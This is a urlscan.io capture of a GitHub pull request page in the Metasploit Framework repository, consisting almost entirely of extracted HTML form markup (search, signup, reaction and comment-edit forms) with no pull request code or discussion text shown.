github.com
Open in
urlscan Pro
140.82.121.4
Public Scan
Submitted URL: https://info.rapid7.com/NDExLU5BSy05NzAAAAF_9OPz874rxeJcyeKcunNq0xiiKUUd0RTBFA_cjB3oJVDnCTf8nPGkMBKXSgv4J-W-tUL3ozifaXyr...
Effective URL: https://github.com/rapid7/metasploit-framework/pull/15670?mkt_tok=NDExLU5BSy05NzAAAAF_9OPz81QCqDdjEZWk8eUms2MQ5hiho...
Submission: On October 06 via api from US — Scanned from DE
Effective URL: https://github.com/rapid7/metasploit-framework/pull/15670?mkt_tok=NDExLU5BSy05NzAAAAF_9OPz81QCqDdjEZWk8eUms2MQ5hiho...
Submission: On October 06 via api from US — Scanned from DE
Form analysis
27 forms found in the DOMGET /rapid7/metasploit-framework/search
<form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="2293158" data-scoped-search-url="/rapid7/metasploit-framework/search" data-owner-scoped-search-url="/orgs/rapid7/search"
data-unscoped-search-url="/search" action="/rapid7/metasploit-framework/search" accept-charset="UTF-8" method="get">
<label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center">
<input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey="s,/" name="q" data-test-selector="nav-search-input" placeholder="Search"
data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search"
data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off">
<input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="TwGunqGPAVznmn7NEgPpu55vC3/Mhj3qsvj/0qRwmN4BP03eq1lbFyTdaNLP24ZaZQhhpLUsSZkdyHHkT2uJpQ==">
<input type="hidden" class="js-site-search-type-field" name="type">
<svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash">
<path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path>
<path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path>
</svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<ul class="d-none js-jump-to-suggestions-template-container">
<li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" role="option">
<a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
<svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
<path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
<svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
<path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
<svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
<path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
</div>
<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
<span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
In this repository
</span>
<span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
All GitHub
</span>
<span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
Jump to
<span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
</a>
</li>
</ul>
<ul class="d-none js-jump-to-no-results-template-container">
<li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2">
<span class="color-text-secondary">No suggested jump to results</span>
</li>
</ul>
<ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-container js-jump-to-suggestions-results-container">
<li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-scoped-search d-none" role="option">
<a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="scoped_search">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
<svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
<path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
<svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
<path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
<svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
<path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
</div>
<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
<span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
In this repository
</span>
<span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
All GitHub
</span>
<span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
Jump to
<span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
</a>
</li>
<li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option">
<a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="owner_scoped_search">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
<svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
<path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
<svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
<path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
<svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
<path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
</div>
<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
<span class="js-jump-to-badge-search-text-default d-none" aria-label="in this organization">
In this organization
</span>
<span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
All GitHub
</span>
<span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
Jump to
<span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
</a>
</li>
<li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-global-search d-none" role="option">
<a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
<svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
<path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
<svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
<path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
<svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
<path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
</div>
<img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
</div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
<span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
In this repository
</span>
<span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
All GitHub
</span>
<span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
Jump to
<span class="d-inline-block ml-1 v-align-middle">↵</span>
</div>
</a>
</li>
</ul>
</div>
</label>
</form>
POST /join?return_to=%2Frapid7%2Fmetasploit-framework%2Fissues%2Fnew
<form class="js-signup-form" autocomplete="off" action="/join?return_to=%2Frapid7%2Fmetasploit-framework%2Fissues%2Fnew" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token"
value="bd291KBqV2GsCzFWo72mbh4ZX3Qtgv7FYs0z8BsPCSYMfzNwcJ1p3QYDIYhJDY5aWC/ULMG+FylyYEFx/UAwsw=="> <auto-check src="/signup_check/username">
<dl class="form-group">
<dt class="input-label"><label name="user[login]" autocapitalize="off" autofocus="autofocus" for="user_login_issues">Pick a username</label></dt>
<dd><input name="user[login]" autocapitalize="off" autofocus="autofocus" class="form-control" type="text" id="user_login_issues" autocomplete="off" spellcheck="false"></dd>
</dl>
<input type="hidden" data-csrf="true" value="pBYf9210MO3L3XhbMf2RoQX6a+OWeZUrhvVkiST8xV1SxsPToBXNiM3Sr8lwFjgythH0qFasXTcG09YcP67RTQ==">
</auto-check>
<auto-check src="/signup_check/email">
<dl class="form-group">
<dt class="input-label"><label name="user[email]" autocapitalize="off" for="user_email_issues">Email Address</label></dt>
<dd><input name="user[email]" autocapitalize="off" class="form-control" type="text" id="user_email_issues" autocomplete="off" spellcheck="false"></dd>
</dl>
<input type="hidden" data-csrf="true" value="QsyCN52OJbWluxDluo/4Mo+awiKFhusrmigEAoZnY/gIBZe2JjiwWcPclbIlQfBUa/LAevL1R1crx/5jqcKsfA==">
</auto-check>
<auto-check src="/users/password">
<dl class="form-group">
<dt class="input-label"><label name="user[password]" for="user_password_issues">Password</label></dt>
<dd><input name="user[password]" class="form-control" type="password" id="user_password_issues" autocomplete="off" spellcheck="false"></dd>
</dl><input type="hidden" data-csrf="true" value="5F6rLSAtvsMRGLTGXckt6woVzBWpumdgtziXsrmBi8tEJCYtDKMO3MfnbP4tufuL/wo5oweVnYXGhsUUsu9ohQ==">
</auto-check>
<input type="hidden" name="source" class="js-signup-source" value="modal-issues">
<input class="form-control" type="text" name="required_field_8e36" hidden="hidden">
<input class="form-control" type="hidden" name="timestamp" value="1633534311549">
<input class="form-control" type="hidden" name="timestamp_secret" value="9847e8769236bfb6bcaf1227b0a08e842a0aec5fdef83e894506ac82ea8c8e8c">
<button data-ga-click="(Logged out) New issue modal, clicked Sign up, text:sign-up" type="submit" data-view-component="true" class="btn-primary btn btn-block mt-2"> Sign up for GitHub </button>
</form>
POST /rapid7/metasploit-framework/reactions
<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token"
value="28iNKMHtowX/Ah02lZBM36ASOdxqPZf4JUDU8ZJHAZ7E3VY9wnAq9RR4wGmqqgVaJDvcE1Y1hvgTZ8Hju8j45g==">
<input type="hidden" name="input[subjectId]" value="MDExOlB1bGxSZXF1ZXN0NzMzMTUyNjA4">
<div class="comment-reactions-options">
<button disabled="" class="
btn-link
tooltipped
tooltipped-multiline
d-flex
flex-items-baseline
social-reaction-summary-item
color-text-secondary
reaction-summary-item tooltipped-se" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="HOORAY react" aria-label="wvu-r7 and ccondon-r7 reacted with hooray emoji" data-button-index-position="0"
data-reaction-content="tada">
<g-emoji alias="hooray" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f389.png" class="social-button-emoji">🎉</g-emoji>
<span>2</span>
</button>
</div>
</form>
POST /rapid7/metasploit-framework/issues/15670
<form class="js-comment-update" id="issue-995381069-edit-form" action="/rapid7/metasploit-framework/issues/15670" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
data-csrf="true" name="authenticity_token" value="lzF+ANalxQMqjJY0kTuyTzhWkW/yqDoHr2auZor67hOxkecKJE0P0/x7XN3oIzo4hdvBTlqPsJWBhN/CiWyBuA=="></form>
POST /rapid7/metasploit-framework/pull/15670/review_comment/707831312
<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/707831312" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
name="authenticity_token" value="+xm1TUPjEhi+/RAAxgfNFQJTX+JFG5/Qm1SmrvXcp7xh5vg2pUOCrBeJ1P99z5Qc+k9qxHjOjRhRyE1oh51unw==" autocomplete="off">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/707831312/edit_form?textarea_id=discussion_r707831312-body&comment_context=discussion"
class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/reactions
<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
value="UZQxl+ej/JOG+QCHw0r7Qdh3QkFVqRrwkSTbt/G/rJKEpA1lKxESNyaKtSAtf+HiPN0aYonEY/vHLxm4q3LZEw==" autocomplete="off">
<input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qMKYQ">
<div class="comment-reactions-options js-comment-reactions-options">
</div>
</form>
POST /rapid7/metasploit-framework/pull/15670/review_comment/707846350
<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/707846350" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
name="authenticity_token" value="gCvtI0vk+gepBjndTfdjzXrqJrxt2igiso+5YifkA02+62x824SKFQ8udGCS8Q7uMuzix0wZCD0WVakwCUuJLw==" autocomplete="off">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/707846350/edit_form?textarea_id=discussion_r707846350-body&comment_context=discussion"
class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/reactions
<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
value="acAUGXpE6Sodhw5UDeEKzp7f6eBqv0GM4dsWopN5qsm88CjrtvYHjr30u/Pj1BBtenWxw7bSOIe30NStybTfSA==" autocomplete="off">
<input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qMODO">
<div class="comment-reactions-options js-comment-reactions-options">
</div>
</form>
POST /rapid7/metasploit-framework/reactions
<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token"
value="pdpEJViTzGp7AUWngjVwDyCo4XIHoBP5PybMezumXiK6z58wWw5FmpB7mPi9DzmKpIEEvTuoAvkJAdlpEimnWg==">
<input type="hidden" name="input[subjectId]" value="IC_kwDOACL9ps42xw1y">
<div class="comment-reactions-options">
<button disabled="" class="
btn-link
tooltipped
tooltipped-multiline
d-flex
flex-items-baseline
social-reaction-summary-item
color-text-secondary
reaction-summary-item tooltipped-se" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="THUMBS_UP react" aria-label="zeroSteiner reacted with thumbs up emoji" data-button-index-position="0"
data-reaction-content="+1">
<g-emoji alias="thumbs up" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f44d.png" class="social-button-emoji">👍</g-emoji>
<span>1</span>
</button>
</div>
</form>
POST /rapid7/metasploit-framework/issue_comments/919014770
<form class="js-comment-update" id="issuecomment-919014770-edit-form" action="/rapid7/metasploit-framework/issue_comments/919014770" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="uNH977W3h2/PaFkf8WbF39619dy6hqq4XZRverr6D4ZyQxRpsyDZlZk6zfTcLQdJ0TF5m9Lh6Y9XcdMLMgEBIQ==">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/919014770/edit_form?textarea_id=issuecomment-919014770-body&comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/issue_comments/920061296
<form class="js-comment-update" id="issuecomment-920061296-edit-form" action="/rapid7/metasploit-framework/issue_comments/920061296" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="q2Eiz6ugq7Lc2KXuXrmzU69Buo3zSoUXR7kZ6xjYsNiNfHW/ZK7v7oARdi7ZQ4208XeGJd6gumib2FtSyY8bvA==">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/920061296/edit_form?textarea_id=issuecomment-920061296-body&comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
